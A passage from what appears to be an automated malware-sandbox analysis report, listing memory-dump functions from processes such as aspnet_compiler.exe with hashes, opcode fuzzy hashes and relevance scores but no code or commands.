                                                      • Instruction ID: 1fe3398f33a3b702db063bc302a81c9316580992adc15be420d43dc0df1cc9dd
                                                      • Opcode Fuzzy Hash: 7ec937a85a827532fdc426387149136216884011c82a8e14f81af89cb31d6a7f
                                                      • Instruction Fuzzy Hash: 3EF02E5150AFCA6FD74673B4481E8E97FE0EE5625075405EAC455CB0A3D81C4C8FC711
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820C58, Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1a39e22d72c193c36b3b9d84a65b513cc278f9aa6b462d425239e9df3709f87
                                                      • Instruction ID: 92636e0d08e0f2590edda6449dad0b6bf14148e78ddd0aa14037fb3a20507156
                                                      • Opcode Fuzzy Hash: e1a39e22d72c193c36b3b9d84a65b513cc278f9aa6b462d425239e9df3709f87
                                                      • Instruction Fuzzy Hash: 94F08170D0C68DDEEB50EB6884445ACBFE0FF01314F1486B5D104D7286EA34A689C744
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC088204C5, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 172e43c8fb1a789605fb101e835e2778b3a41bd5a5619b34884df257d69c1782
                                                      • Instruction ID: d9a458e8bacd87b1caf55630591bc8f91248e4b8929f06e53f187e12212a3011
                                                      • Opcode Fuzzy Hash: 172e43c8fb1a789605fb101e835e2778b3a41bd5a5619b34884df257d69c1782
                                                      • Instruction Fuzzy Hash: 2EE02211C0CAAC0FEBA5A3B400728B53AE0DF1921074906EAC14DC72D3EC4CA849C345
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820CBC, Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d4f1813cb636cff7fc3d15bb271b5e315da49285cd6be955108047b66562d36
                                                      • Instruction ID: 856cc5e7a781655846dae22784c0a1fbe4ef399b76fc939dc94fc9cf12a879fa
                                                      • Opcode Fuzzy Hash: 7d4f1813cb636cff7fc3d15bb271b5e315da49285cd6be955108047b66562d36
                                                      • Instruction Fuzzy Hash: 4DF0BEB0E0865ECFEB44DBA4C490ABCB7B0EB10321F10827AD009C23C6CD382A89C694
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC088260A7, Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c85301532c132ea1aa81e384afacafe5b07d491a39e89b0b289ac55f1c290ca
                                                      • Instruction ID: e4aea1c4dc2bab97b6f123eb6e098f2674c18fe73767e92c3ddba18a8155055e
                                                      • Opcode Fuzzy Hash: 2c85301532c132ea1aa81e384afacafe5b07d491a39e89b0b289ac55f1c290ca
                                                      • Instruction Fuzzy Hash: A1E08C2094993E4BE754A25884296FA23E1DF15310F6502BAD90EFB3E3CD682C46C74A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820F4D, Relevance: .0, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 82089d1c9c14e6bab4a4066d0416187bac36fc29989c8dfa96373c3c9d96eb10
                                                      • Instruction ID: eb05358941dd344f1cbab24b8285e651bf0100552aec31fa559527bf7d453429
                                                      • Opcode Fuzzy Hash: 82089d1c9c14e6bab4a4066d0416187bac36fc29989c8dfa96373c3c9d96eb10
                                                      • Instruction Fuzzy Hash: 70C08C349108088FC908EB2CCC88C0877B0FB0A301BC600A1E00DC71B2E219DCC6C781
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820410, Relevance: .0, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b924d0dd5873fdcc39b56af0d864cfa857f4cf0d51c3b604b4164e9599eea3dd
                                                      • Instruction ID: c466034fc745acd7c6f11ae6ccec44d733812f7464e340b692af1279f0fd2272
                                                      • Opcode Fuzzy Hash: b924d0dd5873fdcc39b56af0d864cfa857f4cf0d51c3b604b4164e9599eea3dd
                                                      • Instruction Fuzzy Hash: 18C08C30514C0C4F8B0CEB28C898CA073E0FB29211FD102A8D00EC71B0EA5A9CC8CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882287E, Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b560963b5ec4703757ce9dd750ae20066deb3c087bce2825c457de8ef417575
                                                      • Instruction ID: 326697d8de1adee1d86c082d4ea76bf35af3cac9b07048565543797fd4e8ba45
                                                      • Opcode Fuzzy Hash: 4b560963b5ec4703757ce9dd750ae20066deb3c087bce2825c457de8ef417575
                                                      • Instruction Fuzzy Hash: 56C01220E18D3E4AE2C0EB18804466872D1AF48300F60C2B6D10CD32D3CE382C4BC798
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: aspnet_compiler.exe PID: 2808 Parent PID: 6788 aspnet_compiler.exeCOMMON

                                                      Executed Functions

                                                      Function 00007FFC08820FB0, Relevance: .5, Instructions: 508COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c76823421adb1b3ea9dfc3efc98004b2841fc4debddb0435f5cf6577dfb9f202
                                                      • Instruction ID: 2bc41037590da2dbbe3db0a0e83e5fa9e7ee59c3cf085efca8590de9dd41bb0f
                                                      • Opcode Fuzzy Hash: c76823421adb1b3ea9dfc3efc98004b2841fc4debddb0435f5cf6577dfb9f202
                                                      • Instruction Fuzzy Hash: 5902E12190C5AE8FEB10F77C94656E97BA1EF42320F1404BAE14CCB2D3DE29654EC765
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820F83, Relevance: .5, Instructions: 507COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 002a125dd40069b14daf11d03c5dfb02f3b50df7147d82edb00c688cc15b5059
                                                      • Instruction ID: f4e837737712540d56a0e3a8078913461daab569166820c7d02fd0aac79eb5e9
                                                      • Opcode Fuzzy Hash: 002a125dd40069b14daf11d03c5dfb02f3b50df7147d82edb00c688cc15b5059
                                                      • Instruction Fuzzy Hash: D302D22690C5AA8FEB01F76C94656F97FA1EF42320F1404BAE14CCB2D3CE29654EC765
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08821183, Relevance: .3, Instructions: 305COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 497f89a2f29b846f564659b2beae6946cf5dfce9646c282b1351cdaf8ee7c2d9
                                                      • Instruction ID: c52a3d8a6c4af545ceb4bbe623ac95498e9794e68a21eb83e819ab94293df9e1
                                                      • Opcode Fuzzy Hash: 497f89a2f29b846f564659b2beae6946cf5dfce9646c282b1351cdaf8ee7c2d9
                                                      • Instruction Fuzzy Hash: BBB1C570E1C55E8FEB44EB688459BB87BB2EF56310F2405B9D00DCB2D7CE686809C765
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820930, Relevance: .3, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f98a11993b6afb1539e7185f9aee580f78a8e3b15ed02d895e969e01a2f9249
                                                      • Instruction ID: fe31f8542369442e2c53dc8240a19d309f9aa8b0b7de403efa2d68dfe15e3777
                                                      • Opcode Fuzzy Hash: 0f98a11993b6afb1539e7185f9aee580f78a8e3b15ed02d895e969e01a2f9249
                                                      • Instruction Fuzzy Hash: 5D81F430B1C81E8FEA44FB289491AB973A2EFD4750F154579E00DCB3D2DE28B946C765
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820DE0, Relevance: .2, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4232276891a30357ecc588f6a0f8db0c1b70e508155f45fe2089457e235fc19d
                                                      • Instruction ID: 6ab40901ccdee6bbd0323d8e451ab00f3b7acc20183edb365e14ba366ff7bd11
                                                      • Opcode Fuzzy Hash: 4232276891a30357ecc588f6a0f8db0c1b70e508155f45fe2089457e235fc19d
                                                      • Instruction Fuzzy Hash: 81512832E0C66E4FEB50A628E455AF977A1EF82320F1542B6D14CCB1C3DA296C4FC364
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882050D, Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 53f97ff3acc6f66181f653146c0c2c7951f421b89e33e04320467fd06154f5b6
                                                      • Instruction ID: 46c19f768e257835947c454a6bf25edb716652a3e51c53e38565d264ff5cac60
                                                      • Opcode Fuzzy Hash: 53f97ff3acc6f66181f653146c0c2c7951f421b89e33e04320467fd06154f5b6
                                                      • Instruction Fuzzy Hash: 31318E31E18D6D8FEB94EB2CA4156BCB7E1EF88310B4402B6D10DD72D6DE286C468795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820DA2, Relevance: .1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08f7ce99302f1c3118bedba4938ba8068b466f20639440146c6b4c4bdeba7f37
                                                      • Instruction ID: ca11778e86ae6207c195408cb53ff222ba71d180f2d7eb48c9fcacfa2378a580
                                                      • Opcode Fuzzy Hash: 08f7ce99302f1c3118bedba4938ba8068b466f20639440146c6b4c4bdeba7f37
                                                      • Instruction Fuzzy Hash: 7C31F42290C57E4EEA50B22CB4A19F57B909F82334B1441B7E18CCA1D3DE1A6C8FC274
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC088207D9, Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f07b11edc4f9a829cb08cb2e3d9565b90282c618e2bf215408636da04a78dd1
                                                      • Instruction ID: 51e3767b156196f39ebdb4600337b4fb7c1c99b8f750b5a5db64f8a50fa78ee3
                                                      • Opcode Fuzzy Hash: 8f07b11edc4f9a829cb08cb2e3d9565b90282c618e2bf215408636da04a78dd1
                                                      • Instruction Fuzzy Hash: 30110821A0885D8FDB54E72CD449EA57BE2EFDA31031942F6D44CCB297DD249C47CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820C2D, Relevance: .1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e04bb262aa49c278dfdf5741f28aedd7b40b5faf22c95730c27c5f7b6cf3e4f8
                                                      • Instruction ID: 0779120eac4dcd818a9b70e32bcb8c35be0a973fddecfa933d330a3945d74355
                                                      • Opcode Fuzzy Hash: e04bb262aa49c278dfdf5741f28aedd7b40b5faf22c95730c27c5f7b6cf3e4f8
                                                      • Instruction Fuzzy Hash: 7521F536D0C55EDAE711EB68C4416ECBBA0FF41324F2486BAC549DB2C7D938264EC7A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820739, Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f62d6d3e9ff6b930a9d6d804d6c00007310cb454b6cad50bb5ccc7693901e19
                                                      • Instruction ID: 8408f71d0e81aff1919296846e305b9dd89b94c7a6cff001e2cecd5225c0c691
                                                      • Opcode Fuzzy Hash: 6f62d6d3e9ff6b930a9d6d804d6c00007310cb454b6cad50bb5ccc7693901e19
                                                      • Instruction Fuzzy Hash: 7C11A011E0D99F4FEA55A32C54A59B43BE1EFAA250B1901B2D00ACF2D7DC196C4ACB72
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820E18, Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14dcaea1b5289550267603d5434c6653086d0c7d3f68740f52b0d4b84d26f85e
                                                      • Instruction ID: 8d89da8b671ecfc9cba30750577a1765c0df7630edbe42b74a13f57fc78ab8bf
                                                      • Opcode Fuzzy Hash: 14dcaea1b5289550267603d5434c6653086d0c7d3f68740f52b0d4b84d26f85e
                                                      • Instruction Fuzzy Hash: 46110831E0C92E4EE650E62CA581AB473A1EFC5324F5542B9D14DCB1C7CE197C8BC365
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820C38, Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3105eb5935048d7605e4074ea22f180a81ef2624902d562e9922e25ca943dec
                                                      • Instruction ID: e7274bbc6c73d8fed1ea7b68039d884af9380d530e741288697bdb4190e5805f
                                                      • Opcode Fuzzy Hash: c3105eb5935048d7605e4074ea22f180a81ef2624902d562e9922e25ca943dec
                                                      • Instruction Fuzzy Hash: 2111C236D0865DCAE711EB68C8446DCBBE0FF42334F2486BAC580E7282DA74664EC790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882044D, Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8cc6c6abae3881243a7e49498ca87337ccfd9b7b6da81d7e7a46de1ebcb8a13
                                                      • Instruction ID: ff8fe881a3c29d81f8b2f1d2ac7ab61d467541a73e35c8ee8d508cb52b246d11
                                                      • Opcode Fuzzy Hash: e8cc6c6abae3881243a7e49498ca87337ccfd9b7b6da81d7e7a46de1ebcb8a13
                                                      • Instruction Fuzzy Hash: 3B01D802D4CDFA0FFA5AA26814216796A90EF56224F4582B6C289C71D3EC48184BC3B9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820C40, Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16587d4ee1e3378cb09ccfaf0a8ed51c1661c4bf8f2856888b0155620d8821e7
                                                      • Instruction ID: e31f61e4f3e8f015c93302c4b16875acc7f35f21dbf85881d741a9d27c2f9b1b
                                                      • Opcode Fuzzy Hash: 16587d4ee1e3378cb09ccfaf0a8ed51c1661c4bf8f2856888b0155620d8821e7
                                                      • Instruction Fuzzy Hash: C901C876D0865DCBE711DB68C8455DCBBF0FF41320F2486BAC584E7282D534664EC790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882157A, Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50e9dcf304aed1f62729e85af84cf027b911da5e273e57f7b3a63fd91f3e668f
                                                      • Instruction ID: f6cfe71ef2cbfb957e925b73c5658ff1c40041d9ad96384eaad91eafcdaddac7
                                                      • Opcode Fuzzy Hash: 50e9dcf304aed1f62729e85af84cf027b911da5e273e57f7b3a63fd91f3e668f
                                                      • Instruction Fuzzy Hash: 6501BC2198D6D64FD75A977458654B03FE2DF8722430D01EED18ACB5A3C84D184BC7A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820C48, Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9215855c37d9b9a98cfff322fa594a8e053bb896e20f213eec66eb27272ba26
                                                      • Instruction ID: bc95e26fe39aadbb07f179b147e01d8e0c479cb59c680b5338210d860b90b569
                                                      • Opcode Fuzzy Hash: f9215855c37d9b9a98cfff322fa594a8e053bb896e20f213eec66eb27272ba26
                                                      • Instruction Fuzzy Hash: 4F01B576D0865DCBEB11DB68C4445ECBBF0FF41320F2486BAC544E7282DA34664EC790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820460, Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d440fd0e929d37342b7075cae18c652a5688a876dd41ef4c8069eeda722aea6d
                                                      • Instruction ID: 4c3077971b15b01366b5c3c43c35fc8754503509a47cd14e9115a1bccb8cce63
                                                      • Opcode Fuzzy Hash: d440fd0e929d37342b7075cae18c652a5688a876dd41ef4c8069eeda722aea6d
                                                      • Instruction Fuzzy Hash: 42F0680294CDFA4FF65A626814626B56FA0EB5B110F0992B6C599C71D3DC481C4A83BA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08822C7E, Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1653c76e95d6dd96fd79f9d347333516d787a1e3453cbc7fab79a47bf98295c3
                                                      • Instruction ID: c13f5e4c46ade93f981b9aed94ea4b390f772a1b8e6ea225d43a137ccb3bb570
                                                      • Opcode Fuzzy Hash: 1653c76e95d6dd96fd79f9d347333516d787a1e3453cbc7fab79a47bf98295c3
                                                      • Instruction Fuzzy Hash: C5F06821E0C43F9BFAA4A6184044B786191AF44350F258276C10DD72C7CD286D4FC379
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820C50, Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b05a775ce000aa15c630110ff8bd9a0b1f689b11985477d88629c008b9b782ad
                                                      • Instruction ID: eaba8302b7e3637badf8134a3f624064dc8d49245e05219672f51a32d6a4651d
                                                      • Opcode Fuzzy Hash: b05a775ce000aa15c630110ff8bd9a0b1f689b11985477d88629c008b9b782ad
                                                      • Instruction Fuzzy Hash: 85018475D0C65DDBEB50DB68C8445ECBBE0FF41310F1486B5D544E7286DA34664DC750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC088206E9, Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9212437ca575527b2f7ff11c892972125f7f26aa2f3a710f29b2794029d524b7
                                                      • Instruction ID: 8f70906e71d8f8ba8378dec9bf7f07a4a3a057092a71367823b428f2f27981de
                                                      • Opcode Fuzzy Hash: 9212437ca575527b2f7ff11c892972125f7f26aa2f3a710f29b2794029d524b7
                                                      • Instruction Fuzzy Hash: BFF0A720B14C0A8FD988F72C9445D6437D1EFA93417444171E009CB2E3DD25EC8A8B11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882284C, Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9fd496558eb6ac86e79e79c4e1e8ca6d6f8257bddb8ab15e8aff980880a806dd
                                                      • Instruction ID: 4d0d71f67630a131e7187f70288836c38575ba156cfc10862aceb334ecd93118
                                                      • Opcode Fuzzy Hash: 9fd496558eb6ac86e79e79c4e1e8ca6d6f8257bddb8ab15e8aff980880a806dd
                                                      • Instruction Fuzzy Hash: C2F0A021E1882F4BEA94A61C80556B463E2EF84320B258276D50DCB2D7CE286D0B87B5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820C58, Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1a39e22d72c193c36b3b9d84a65b513cc278f9aa6b462d425239e9df3709f87
                                                      • Instruction ID: 92636e0d08e0f2590edda6449dad0b6bf14148e78ddd0aa14037fb3a20507156
                                                      • Opcode Fuzzy Hash: e1a39e22d72c193c36b3b9d84a65b513cc278f9aa6b462d425239e9df3709f87
                                                      • Instruction Fuzzy Hash: 94F08170D0C68DDEEB50EB6884445ACBFE0FF01314F1486B5D104D7286EA34A689C744
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC088204C5, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 172e43c8fb1a789605fb101e835e2778b3a41bd5a5619b34884df257d69c1782
                                                      • Instruction ID: d9a458e8bacd87b1caf55630591bc8f91248e4b8929f06e53f187e12212a3011
                                                      • Opcode Fuzzy Hash: 172e43c8fb1a789605fb101e835e2778b3a41bd5a5619b34884df257d69c1782
                                                      • Instruction Fuzzy Hash: 2EE02211C0CAAC0FEBA5A3B400728B53AE0DF1921074906EAC14DC72D3EC4CA849C345
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08829BD0, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 34ac3db2b55ecd292bfc9817b0afc282ff3a5563ac845382fc5232b6b559c9cd
                                                      • Instruction ID: 8ab304d1fb67960dd31d59284b989dd562f9a116664bbcbe0325f87d880b4300
                                                      • Opcode Fuzzy Hash: 34ac3db2b55ecd292bfc9817b0afc282ff3a5563ac845382fc5232b6b559c9cd
                                                      • Instruction Fuzzy Hash: 86F08220F5C81F8FDA49FB289495AB522D2EFC9300F808178E00DCB3D2ED28A845CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC088215A0, Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b98bd7be99496917a4d5764931b4c94c1e2c61492e0e19df5b980435de2a760b
                                                      • Instruction ID: eb4757da2408331811df8453de60bbb8f462ead4edbf6af4698c91e045a89b1b
                                                      • Opcode Fuzzy Hash: b98bd7be99496917a4d5764931b4c94c1e2c61492e0e19df5b980435de2a760b
                                                      • Instruction Fuzzy Hash: 61E0D821E5C85E8ADF2CA67824615B472A1DF85314B0906BDD14ECBAC7DC4D5C45C7F1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820CBC, Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d4f1813cb636cff7fc3d15bb271b5e315da49285cd6be955108047b66562d36
                                                      • Instruction ID: 856cc5e7a781655846dae22784c0a1fbe4ef399b76fc939dc94fc9cf12a879fa
                                                      • Opcode Fuzzy Hash: 7d4f1813cb636cff7fc3d15bb271b5e315da49285cd6be955108047b66562d36
                                                      • Instruction Fuzzy Hash: 4DF0BEB0E0865ECFEB44DBA4C490ABCB7B0EB10321F10827AD009C23C6CD382A89C694
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC088260A7, Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.531336720.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
